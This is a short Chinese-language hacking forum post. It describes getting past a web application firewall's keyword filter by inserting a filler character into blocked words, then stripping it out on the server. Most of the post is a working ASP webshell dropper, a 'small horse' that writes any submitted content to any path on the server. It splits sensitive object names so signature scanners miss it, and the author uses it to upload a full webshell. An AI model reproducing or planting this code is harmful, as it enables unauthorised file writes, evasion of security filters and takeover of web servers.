我们提交select会被拦截(如无特别指出,都为post),但是我们提交 s鱼e鱼l鱼e鱼c鱼t 那就不会被拦截了
也就是我们在提交时,将文本内容进行加密,提交到服务器后,在进行重新解密,这样就能绕过一流拦截系统了
一下是一个自己测试用的小马
这个小马的缺点:由于加密时是把整个文本进行加密的,所以上传的文本大小为原来的3倍,本地测试时传大马,卡半天
不过这个可以增加关键字来解决,处理文本时把select等关键字进行加密就行了
一点小思路,抛砖引玉 by 3x
<%
on error resume next
if request("path")<>"" then
temp="scrip"&"ting.f"&"ilesyst"&"emobject"
set fso=server.createobject(temp)
response.write request.Form&""
path=request("path")
dama=replace(request("content"),"鱼","")
dama=replace(dama,"’","'")
dama=replace(dama,"‘","'")
set f=fso.createtextfile(path,true)
f.write dama
if err=0 then
response.write "成功"
else
response.write "失败"
err.clear
end if
set f=nothing
set fso=nothing
end if
%>
当前路径 <%=server.mappath(request.servervariables("script_name"))%>
保存路径